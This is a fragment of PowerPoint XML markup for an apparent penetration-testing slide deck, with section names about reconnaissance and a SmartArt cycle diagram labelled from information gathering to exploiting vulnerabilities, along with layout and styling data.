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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="318" r:id="rId6"/>
    <p:sldId id="325" r:id="rId7"/>
    <p:sldId id="323" r:id="rId8"/>
    <p:sldId id="324" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="326" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="270" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="315" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="274" r:id="rId25"/>
    <p:sldId id="316" r:id="rId26"/>
    <p:sldId id="317" r:id="rId27"/>
    <p:sldId id="275" r:id="rId28"/>
    <p:sldId id="276" r:id="rId29"/>
    <p:sldId id="277" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="278" r:id="rId32"/>
    <p:sldId id="279" r:id="rId33"/>
    <p:sldId id="280" r:id="rId34"/>
    <p:sldId id="285" r:id="rId35"/>
    <p:sldId id="281" r:id="rId36"/>
    <p:sldId id="282" r:id="rId37"/>
    <p:sldId id="283" r:id="rId38"/>
    <p:sldId id="286" r:id="rId39"/>
    <p:sldId id="287" r:id="rId40"/>
    <p:sldId id="288" r:id="rId41"/>
    <p:sldId id="284" r:id="rId42"/>
    <p:sldId id="291" r:id="rId43"/>
    <p:sldId id="305" r:id="rId44"/>
    <p:sldId id="292" r:id="rId45"/>
    <p:sldId id="293" r:id="rId46"/>
    <p:sldId id="294" r:id="rId47"/>
    <p:sldId id="290" r:id="rId48"/>
    <p:sldId id="295" r:id="rId49"/>
    <p:sldId id="296" r:id="rId50"/>
    <p:sldId id="297" r:id="rId51"/>
    <p:sldId id="298" r:id="rId52"/>
    <p:sldId id="299" r:id="rId53"/>
    <p:sldId id="300" r:id="rId54"/>
    <p:sldId id="301" r:id="rId55"/>
    <p:sldId id="302" r:id="rId56"/>
    <p:sldId id="303" r:id="rId57"/>
    <p:sldId id="304" r:id="rId58"/>
    <p:sldId id="306" r:id="rId59"/>
    <p:sldId id="307" r:id="rId60"/>
    <p:sldId id="308" r:id="rId61"/>
    <p:sldId id="309" r:id="rId62"/>
    <p:sldId id="314" r:id="rId63"/>
    <p:sldId id="310" r:id="rId64"/>
    <p:sldId id="311" r:id="rId65"/>
    <p:sldId id="312" r:id="rId66"/>
    <p:sldId id="313" r:id="rId67"/>
    <p:sldId id="333" r:id="rId68"/>
    <p:sldId id="341" r:id="rId69"/>
    <p:sldId id="334" r:id="rId70"/>
    <p:sldId id="343" r:id="rId71"/>
    <p:sldId id="335" r:id="rId72"/>
    <p:sldId id="342" r:id="rId73"/>
    <p:sldId id="336" r:id="rId74"/>
    <p:sldId id="337" r:id="rId75"/>
    <p:sldId id="338" r:id="rId76"/>
    <p:sldId id="344" r:id="rId77"/>
    <p:sldId id="345" r:id="rId78"/>
    <p:sldId id="319" r:id="rId79"/>
    <p:sldId id="320" r:id="rId80"/>
    <p:sldId id="321" r:id="rId81"/>
    <p:sldId id="322" r:id="rId82"/>
    <p:sldId id="327" r:id="rId83"/>
    <p:sldId id="328" r:id="rId84"/>
    <p:sldId id="329" r:id="rId85"/>
    <p:sldId id="330" r:id="rId86"/>
    <p:sldId id="331" r:id="rId87"/>
    <p:sldId id="332" r:id="rId88"/>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3BD48E-E8C6-EF4F-833C-4B9D61AC5ED7}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Recon" id="{E3792D8E-0055-AE4D-93C6-3D1669013925}">
          <p14:sldIdLst>
            <p14:sldId id="318"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Recon - Discovery" id="{0AD0AB69-0EDA-DE45-AD1C-71EED0F55785}">
          <p14:sldIdLst>
            <p14:sldId id="325"/>
            <p14:sldId id="323"/>
            <p14:sldId id="324"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="326"/>
            <p14:sldId id="269"/>
            <p14:sldId id="271"/>
            <p14:sldId id="270"/>
            <p14:sldId id="272"/>
            <p14:sldId id="315"/>
            <p14:sldId id="273"/>
            <p14:sldId id="274"/>
            <p14:sldId id="316"/>
            <p14:sldId id="317"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Recon - Vuln Scanning" id="{19EDB5CC-1983-D243-9739-0ED3AB5FF202}">
          <p14:sldIdLst>
            <p14:sldId id="275"/>
            <p14:sldId id="276"/>
            <p14:sldId id="277"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Recon - DNS" id="{ACE58682-093B-A646-BB46-4E51D6F8CD61}">
          <p14:sldIdLst>
            <p14:sldId id="289"/>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="285"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="286"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="284"/>
            <p14:sldId id="291"/>
            <p14:sldId id="305"/>
            <p14:sldId id="292"/>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="290"/>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="297"/>
            <p14:sldId id="298"/>
            <p14:sldId id="299"/>
            <p14:sldId id="300"/>
            <p14:sldId id="301"/>
            <p14:sldId id="302"/>
            <p14:sldId id="303"/>
            <p14:sldId id="304"/>
            <p14:sldId id="306"/>
            <p14:sldId id="307"/>
            <p14:sldId id="308"/>
            <p14:sldId id="309"/>
            <p14:sldId id="314"/>
            <p14:sldId id="310"/>
            <p14:sldId id="311"/>
            <p14:sldId id="312"/>
            <p14:sldId id="313"/>
            <p14:sldId id="333"/>
            <p14:sldId id="341"/>
            <p14:sldId id="334"/>
            <p14:sldId id="343"/>
            <p14:sldId id="335"/>
            <p14:sldId id="342"/>
            <p14:sldId id="336"/>
            <p14:sldId id="337"/>
            <p14:sldId id="338"/>
            <p14:sldId id="344"/>
            <p14:sldId id="345"/>
            <p14:sldId id="319"/>
            <p14:sldId id="320"/>
            <p14:sldId id="321"/>
            <p14:sldId id="322"/>
            <p14:sldId id="327"/>
            <p14:sldId id="328"/>
            <p14:sldId id="329"/>
            <p14:sldId id="330"/>
            <p14:sldId id="331"/>
            <p14:sldId id="332"/>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p:restoredTop sz="82514" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="115" d="100"/>
          <a:sy n="115" d="100"/>
        </p:scale>
        <p:origin x="1008" y="192"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1800"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="103" d="100"/>
          <a:sy n="103" d="100"/>
        </p:scale>
        <p:origin x="-93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8F67B3-51CB-4944-B1EF-EE12C354BB13}"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89B5DF13-5391-1542-987C-D6BA1F7F6F79}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Information Gathering</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E174431-169A-FC4F-841C-20C7A2B46E48}" type="parTrans" cxnId="{7DF0FBEC-914B-974F-B8BB-4F2A92BDA21E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" type="sibTrans" cxnId="{7DF0FBEC-914B-974F-B8BB-4F2A92BDA21E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{096700AA-A667-4F41-AD04-3304C42905A5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Application Workflows</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F323898-3B1F-CC48-B4AB-0DAF9FAB03D6}" type="parTrans" cxnId="{1ACF42C1-F4C6-C84D-9A6D-CFE34A6727E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" type="sibTrans" cxnId="{1ACF42C1-F4C6-C84D-9A6D-CFE34A6727E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Automated &amp; Manual Fuzzing/Scanning</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6208FB2-BF53-204C-BDB8-638D66896282}" type="parTrans" cxnId="{7E4D2E33-6888-BA42-BEF8-3D3026EB1E75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" type="sibTrans" cxnId="{7E4D2E33-6888-BA42-BEF8-3D3026EB1E75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Exploiting Vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09366BEE-8727-D946-92BD-EE7E80DB5442}" type="parTrans" cxnId="{5BFA8480-8592-5941-91E2-0F78C036DEA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" type="sibTrans" cxnId="{5BFA8480-8592-5941-91E2-0F78C036DEA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" type="pres">
      <dgm:prSet presAssocID="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" presName="cycle" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E71112B-BA1E-ED46-A7CF-C775A3B2EC2E}" type="pres">
      <dgm:prSet presAssocID="{89B5DF13-5391-1542-987C-D6BA1F7F6F79}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" type="pres">
      <dgm:prSet presAssocID="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D95D327-DF61-F849-82F4-709ED0851183}" type="pres">
      <dgm:prSet presAssocID="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}" type="pres">
      <dgm:prSet presAssocID="{096700AA-A667-4F41-AD04-3304C42905A5}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F23CEF6E-F172-4847-A088-551C30395A5E}" type="pres">
      <dgm:prSet presAssocID="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B133B32-732B-B44E-9F74-11F574986D50}" type="pres">
      <dgm:prSet presAssocID="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}" type="pres">
      <dgm:prSet presAssocID="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" type="pres">
      <dgm:prSet presAssocID="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87699C82-69FF-BB43-B2F3-0038560DEADB}" type="pres">
      <dgm:prSet presAssocID="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}" type="pres">
      <dgm:prSet presAssocID="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" type="pres">
      <dgm:prSet presAssocID="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7874D362-53F7-BA43-9BF5-A1597FBE5EF1}" type="pres">
      <dgm:prSet presAssocID="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2EC8E710-A3A4-F646-82A8-A29FB337BA63}" type="presOf" srcId="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}" destId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{AE324B2D-F4AF-8E44-ADBD-8EBFE19268E7}" type="presOf" srcId="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}" destId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{7E4D2E33-6888-BA42-BEF8-3D3026EB1E75}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}" srcOrd="2" destOrd="0" parTransId="{B6208FB2-BF53-204C-BDB8-638D66896282}" sibTransId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}"/>
    <dgm:cxn modelId="{7E061F52-8330-1C48-81E1-52B6995159F5}" type="presOf" srcId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" destId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{6E88E05F-1421-4B44-AA33-82C0B37FD11D}" type="presOf" srcId="{89B5DF13-5391-1542-987C-D6BA1F7F6F79}" destId="{1E71112B-BA1E-ED46-A7CF-C775A3B2EC2E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{28D39375-D15B-4F41-90FD-21BFB48940F5}" type="presOf" srcId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" destId="{F23CEF6E-F172-4847-A088-551C30395A5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{C6626C77-E760-D043-A362-BF0A61781C8C}" type="presOf" srcId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" destId="{87699C82-69FF-BB43-B2F3-0038560DEADB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{5BFA8480-8592-5941-91E2-0F78C036DEA8}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}" srcOrd="3" destOrd="0" parTransId="{09366BEE-8727-D946-92BD-EE7E80DB5442}" sibTransId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}"/>
    <dgm:cxn modelId="{8F3F6885-B60F-4940-8FD2-66E358D3A51E}" type="presOf" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{1ACF42C1-F4C6-C84D-9A6D-CFE34A6727E5}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{096700AA-A667-4F41-AD04-3304C42905A5}" srcOrd="1" destOrd="0" parTransId="{2F323898-3B1F-CC48-B4AB-0DAF9FAB03D6}" sibTransId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}"/>
    <dgm:cxn modelId="{DC3DD7D1-0C33-BD46-A333-A71FB6977EAD}" type="presOf" srcId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" destId="{9D95D327-DF61-F849-82F4-709ED0851183}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{0C2B62E1-A064-D249-ABE3-563D9E790F89}" type="presOf" srcId="{096700AA-A667-4F41-AD04-3304C42905A5}" destId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{708012E7-3A9F-DB4E-9060-C33E582BFBC4}" type="presOf" srcId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" destId="{5B133B32-732B-B44E-9F74-11F574986D50}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{7DF0FBEC-914B-974F-B8BB-4F2A92BDA21E}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{89B5DF13-5391-1542-987C-D6BA1F7F6F79}" srcOrd="0" destOrd="0" parTransId="{0E174431-169A-FC4F-841C-20C7A2B46E48}" sibTransId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}"/>
    <dgm:cxn modelId="{D17812F8-C0ED-6A45-941C-E68066EFF948}" type="presOf" srcId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" destId="{7874D362-53F7-BA43-9BF5-A1597FBE5EF1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{D7B670FC-19F8-2143-9EE6-BBB05EBD0D0B}" type="presOf" srcId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" destId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{9BCCCCFE-9DE0-D642-AB4F-D3A60AB86241}" type="presOf" srcId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" destId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{1E6DDAD4-ADA3-7640-BB72-A614F9AB926C}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{1E71112B-BA1E-ED46-A7CF-C775A3B2EC2E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{28F2D1F3-EE96-8442-914C-021C77EBFA49}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{33902AE6-D763-C744-8C17-FBE84DF7EC42}" type="presParOf" srcId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" destId="{9D95D327-DF61-F849-82F4-709ED0851183}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{93D8D5A3-D186-DA4B-8559-9AF29D6D093C}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{DBB51971-D678-BA45-9A0E-C5A84A8B8FAF}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{F23CEF6E-F172-4847-A088-551C30395A5E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{A22E957E-E99D-224D-BA54-4A250460F7B5}" type="presParOf" srcId="{F23CEF6E-F172-4847-A088-551C30395A5E}" destId="{5B133B32-732B-B44E-9F74-11F574986D50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{125E5751-900A-9140-BCBA-1010E4EE9E62}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{B22C2366-E806-2E43-94C0-18AF42C3E8E5}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{342E6F7F-47A1-7E49-9EB0-C23D3F6A0DD9}" type="presParOf" srcId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" destId="{87699C82-69FF-BB43-B2F3-0038560DEADB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{C1CCDC11-D21A-5E41-BADA-F8EC854F291E}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{F48F0B94-079D-8B41-9245-B339B92EE8DC}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{E125C8FA-2A4F-2B4C-B455-14EB8170DFE2}" type="presParOf" srcId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" destId="{7874D362-53F7-BA43-9BF5-A1597FBE5EF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1112B-BA1E-ED46-A7CF-C775A3B2EC2E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3512046" y="1252"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">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Information Gathering</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3688588" y="177794"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{070AB206-FD02-7640-AD17-5D60379E1FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2700000">
          <a:off x="4588344" y="1035041"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>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602484" y="1082277"/>
        <a:ext cx="225289" cy="244114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
